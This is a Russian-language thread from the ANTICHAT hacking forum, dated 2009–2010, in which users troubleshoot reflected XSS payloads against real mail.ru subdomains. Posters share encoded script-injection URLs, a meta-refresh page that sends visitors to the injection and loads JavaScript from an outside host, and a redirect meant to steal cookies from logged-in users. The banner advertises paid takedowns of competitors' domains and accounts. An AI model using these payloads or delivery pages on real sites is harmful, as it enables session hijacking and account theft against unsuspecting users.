УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
Вопрос по пассивной XSS

Опции темы

Поиск в этой теме

Опции просмотра

Вопрос по пассивной XSS

20.12.2009, 01:54

maxim_mm

Новичок

Регистрация: 17.12.2009

Сообщений: 3

Провел на форуме:
9217

Репутация: 0

Вопрос по пассивной XSS

12 декабря, в теме пассивные XSS - выложена вот такая пасивка

Код:

http://story.travel.mail.ru/?mod=story&city_id=1543&%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%28/Ruslan1817/%29%3C/script%3E

создаю index.html с таким содержимым

Код:

<html> <head> <META HTTP-EQUIV='Refresh' content ='0; URL= http://story.travel.mail.ru/?mod=story&city_id=1543&%27%3E%3C%27%27%3E%22%3E%3Cscript src=%22http://test23.1gb.ru/js.js%22%3C/script%3E'> </head> </html>

файл js.js

Код:

alert(/bla bla bla/)

По идее ведь, при попадании на мою страничку - должна сработать эта пасивка и запустится этот тестовый скриптик.

А он почему то не запускается...

P.S. пробую это первый раз...

20.12.2009, 13:16

Root-access

Участник форума

Регистрация: 18.06.2008

Сообщений: 222

Провел на форуме:
2223440

Репутация: 648

Отправить сообщение для Root-access с помощью ICQ

Там фильтрация на пробелы - они заменяются на нижний прочерк.

21.12.2009, 00:40

maxim_mm

Новичок

Регистрация: 17.12.2009

Сообщений: 3

Провел на форуме:
9217

Репутация: 0

создаю index.html с таким содержимым

Код:

<html> <head> <META HTTP-EQUIV='Refresh' content ='0; URL= http://story.travel.mail.ru/?mod=story&city_id=1543&%27%3E%3C%27%27%3E%22%3E%3Cscript src=%22http://test23.1gb.ru/js.js%22%3C/script%3E'> </head> </html>

заменил на

Код:

<html> <head> <META HTTP-EQUIV='Refresh' content ='0; URL= http://story.travel.mail.ru/?mod=story&city_id=1543&%27%3E%3C%27%27%3E%22%3E%3Cscript src=%22http://test23.1gb.ru/js.js%22%3E%3C/script%3E'> </head> </html>

А то у меня там > не закрывалась после <script...

А с фильтрацией пробела.. заменить пробел на _ в тексте?
Попробовал. скрипт не выполнился... ну или я не увидел его выполнения...

Когда пишу скрипт внутри тэгов <script> </script> все работает... ставлю внешний - не работает. что еще я могу не так делать?

Последний раз редактировалось maxim_mm; 21.12.2009 в 00:55..

22.12.2009, 22:11

maxim_mm

Новичок

Регистрация: 17.12.2009

Сообщений: 3

Провел на форуме:
9217

Репутация: 0

Разобрался)

26.02.2010, 13:05

pitter

Новичок

Регистрация: 02.10.2009

Сообщений: 10

Провел на форуме:
83128

Репутация: 0

У меня вопрос вот есть пассивка
http://11x11.mail.ru/tournaments/414252/act=join&%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert (document.cookie)%3C/script%3E
Работает она токо у авторизованных
Почему она не присылает куки
со всеми остальными пассивками все работает

в index.php прописываю
<script>document.location.href="http://11x11.mail.ru/tournaments/414252/act=join&%27%3E%3C%27%27%3E%22%3E%3Cscript%20src=% 22http://wowvk.ru/js.js%22%3E%3C/script%3E"</script>

Последний раз редактировалось pitter; 26.02.2010 в 13:11..

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Сетевой этикет (Перед тем, как задать вопрос хакеру)	satana-fu	Статьи	7	21.10.2009 07:40
ВКонтакте "счастливый фермер"	ЖенькО	Социальные сети	309	22.07.2009 11:35
Proxy FAQ	foreva	Чужие Статьи	12	04.01.2008 12:15
Вопрос про XSS на форуме IPB 2.1.2.	Astro	Форумы	7	10.01.2006 22:19
Вопрос по использованию XSS на Powered by Invision Power Board(U) v1.3 Final	rsha1988	Форумы	12	15.02.2005 01:44

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход